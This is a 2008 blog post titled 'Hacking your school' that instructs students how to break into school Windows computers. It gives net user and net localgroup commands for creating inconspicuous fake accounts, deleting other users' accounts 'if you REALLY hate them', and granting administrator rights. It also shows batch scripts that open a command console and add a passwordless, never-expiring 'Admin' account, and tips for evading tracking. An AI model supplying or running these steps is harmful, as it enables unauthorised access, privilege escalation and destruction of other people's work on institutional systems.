Saturday, March 1, 2008
Hacking your schoolAdding/modifying user accountsC:>net user username /ADDwhere username is the name of your new account. And remember, try and make it look inconspicuous, then they'll just think its a student who really is at school, when really, the person doesn't EXIST! IF you wanna have a password, use this instead:C:>net user username password /ADDwhere password is the password you want to have. So for instance the above would create an account called 'username', with the password being 'password'. The below would have a username of 'JohnSmith' and a password of 'fruity'C:>net user JohnSmith fruity /ADDRight then, now that we can create accounts, let's delete themC:>net user JohnSmith /DELETEThis will delete poor liddle JohnSmith's account. Awww. Do it to you enemies:P no only joking becuase they could have important work... well okay only if you REALLY hate themLet's give you admin privelegesC:>net localgroup administrator JohnSmith /ADDThis will make JohnSmith an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to.You can list all the localgroups by typingC:>net localgroupRunning .exe files you can't usually runIn the command prompt, use cd (change directory) to go to where the file is, use DIR to get the name of it, and put a shortcut of it on to a floppy. Run the program off the floppy disk.And if you cant make an admin a/c try thisCode:open notepad and copy this:@echo offnet user Admin /add /expires:never /passwordreq:nonet localgroup "Administrators" /add Admin***************save this with a .bat extension and it might worksorCode:step 1. log onto an anonymous account the general school login. harder to track you but they still can track computer number and time of day... but if you dont know it forget about it.step 2. open notepad and type command.com and click file> saveas > then type like test.bat . file extension must be .batstep 3. open the folder you saved it in and run it. and your in command console.step 4. change directorys. not sure if you have to do this but i did. and will always just to be save and to save time.... type cd C:\ and hit enterstep 5. next type net user username /ADD hit enter....step 6. open notepad again and put this in it.@echo offnet user Admin /add /expires:never /passwordreq:nonet localgroup \"Administrators\" /add Adminsave as test2.bat again must be a .batstep 7. run it.step 8. your done log off and login asusername= Adminpass= blank.
Labels:
Hacking your school
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment